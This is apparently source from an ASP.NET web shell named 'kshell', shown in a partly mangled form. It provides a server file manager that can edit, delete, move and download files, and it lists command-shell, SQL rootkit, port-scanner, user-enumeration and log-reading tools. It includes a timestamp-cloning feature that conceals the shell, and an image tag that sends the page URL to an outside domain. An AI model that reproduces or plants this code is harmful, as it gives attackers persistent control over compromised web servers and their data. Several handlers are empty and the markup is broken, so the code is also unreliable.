Go to: | <%dim i as integerfor i =0 to Directory.GetLogicalDrives().length-1 response.Write("<a href='?action=goto&src=" & Directory.GetLogicalDrives(i) & "'>" & Directory.GetLogicalDrives(i) & " </a>")next%> | <td align="Left"><%response.Write("IP:<font color=red>" & Request.ServerVariables("REMOTE_ADDR")&"</font>")%>
Tool: | <a href="?action=sqlrootkit" >SqlRootKit.NET </a> - <a href="?action=cmd" >CMD.NET</a> - <a href="?action=cmdw32" >kshellW32</a> - <a href="?action=cmdwsh" >kshellWSH</a> - <a href="?action=clonetime&src=<%=server.UrlEncode(url)%>" >CloneTime</a> - <a href="?action=information" >System Info</a> - <a href="?action=pro1" >List Processes 1</a> - <a href="?action=pro2" >List Processes 2</a> |
| <a href="?action=user" >List User Accounts</a> - <a href="?action=auser" >IIS Anonymous User</a>- <a href="?action=scan" >Port Scanner</a> - <a href="?action=iisspy" >IIS Spy</a> - <a href="?action=applog" >Application Event Log </a> - <a href="?action=syslog" >System Log</a> |
<hr><table width=100% class=main cellspacing=0 cellpadding=1><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th>
<% guru= " |
<a href='?action=goto&src=" & server.UrlEncode(Getparentdir(url)) & "'>[..]</a> |
" response.Write(guru) dim lll lll=1 for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) if lll=1 then lll=2 else lll=1 end if guru= "<tr class=l" & lll & "><a href='?action=goto&src=" & filepath & "\" & "'>[" & xdir.name & "]</a> | " response.Write(guru) response.Write("<dir> | ") response.Write("" & Directory.GetLastWriteTime(url & xdir.name) & " | ") guru="<a href='?action=cut&src=" & filepath & "\' target='_blank'>Cut" & "</a>|<a href='?action=copy&src=" & filepath & "\' target='_blank'>Copy</a>|<a href='?action=del&src=" & filepath & "\'" & " onclick='return del(this);'>Del</a> | " response.Write(guru) response.Write("
") next %> <% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write(" |
") if lll=1 then lll=2 else lll=1 end if guru= "<tr class=l" & lll & "><a href='?action=edit&src=" & filepath2 & "'>" & xfile.name & "</a> | " response.Write(guru) guru="" & GetSize(xfile.length) & " | " response.Write(guru) response.Write("" & file.GetLastWriteTime(url & xfile.name) & " | ") guru="<a href='?action=edit&src=" & filepath2 & "'>Edit</a>|<a href='?action=cut&src=" & filepath2 & "' target='_blank'>Cut</a>|<a href='?action=copy&src=" & filepath2 & "' target='_blank'>Copy</a>|<a href='?action=rename&src=" & filepath2 & "'>Rename</a>|<a href='?action=down&src=" & filepath2 & "' onClick='return down(this);'>Download</a>|<a href='?action=del&src=" & filepath2 & "' onClick='return del(this);'>Del</a> | " response.Write(guru) response.Write("
") next response.Write("") %> <a href="https://privdayz.com/"><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" /></a><script language="javascript">function del(){if(confirm("Are you sure?")){return true;}else{return false;}}function down(){if(confirm("If the file size > 20M,\nPlease don\'t download\nYou can copy file to web directory ,use http download\nAre you sure download?")){return true;}else{return false;}}</script><%case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if%><div align=center>[ Web Server Information ] <i><a href="javascript:history.back(1);">Back</a></i></div>
<table width="100%" border="1" align="center"> <td width="40%">Server IP <td width="60%"><%=request.ServerVariables("LOCAL_ADDR")%>
<td height="73">Machine Name <%=Environment.MachineName%> |
Network Name | <%=Environment.UserDomainName.ToString()%> |
User Name in this Process | <%=Environment.UserName%> |
OS Version | <%=Environment.OSVersion.ToString()%> |
Started Time | <%=GetStartedTime(Environment.Tickcount)%> Hours |
System Time | <%=now%> |
IIS Version | <%=request.ServerVariables("SERVER_SOFTWARE")%> |
HTTPS | <%=request.ServerVariables("HTTPS")%> |
PATH_INFO | <%=request.ServerVariables("PATH_INFO")%> |
PATH_TRANSLATED | <%=request.ServerVariables("PATH_TRANSLATED")%> |
SERVER_PORT | <%=request.ServerVariables("SERVER_PORT")%> |
SeesionID | <%=Session.SessionID%> |
<td colspan="2"><span class="style3">Client Infomation</span>
Client Proxy | <%=CP%> |
Client IP | <%=CIP%> |
User | <%=request.ServerVariables("HTTP_USER_AGENT")%> |
<table align=center> <% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %> <textArea cols=50 rows=10><% output_all_environment_variables("text") %></textarea> | <textArea cols=50 rows=10><% output_all_Server_variables("text") %></textarea> |
<% case "cmd"%><% case "cmdw32"%><% case "cmdwsh"%><% case "pro1"%><% case "pro2"%><% case "user"%><% case "reg"%><% case "applog"%><% case "syslog"%><% case "auser"%><% case "scan"%> <%case "iisspy"%> <p align=center>[ IIS Spy ] <i><a href="javascript:history.back(1);">Back</a></i></p> <% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %><%case "sqltool"%> <p align=center>[ SQL Tool ] <i><a href="javascript:history.back(1);">Back</a></i></p> <% Try Catch rw("This function is disabled by server") End Try %><%case "regshell"%> <% case "sqlman"%><% case "sqlrootkit"%><% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("<script>alert(""Delete " & replace(a,"\","\\") & " Success!"");location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(a)) &"'</script>") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("<script>alert('File info have add the cutboard, go to target directory click paste!');location.href='JavaScript:self.close()';</script>") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>") end if end if case "upfile" url=request.QueryString("src")%><a href="javascript:history.back(1);" style="color:#FF0000">Go Back </a><% case "new" url=request.QueryString("src")%><a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a><% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend%><a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a><% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %><a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a><script language="javascript">function checkname(){if(formRn.name.value==""){alert("You shall input filename :(");return false}}</script> <% else if Rename() then response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>") else response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>") end if end if case "samename" url=request.QueryString("src")%><a href="javascript:history.back(1);" style="color:#FF0000">Go Back</a> <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %><p> <% case "logout" session.Abandon() response.Write("<script>alert(' Goodbye !');location.href='" & request.ServerVariables("URL") & "';</sc" & "ript>") end selectend ifCatch error_x response.Write("<font color=""red"">
Wrong: </font>"&error_x.Message)End Try%></p></p><hr><script language="javascript">function closewindow(){self.close();}</script>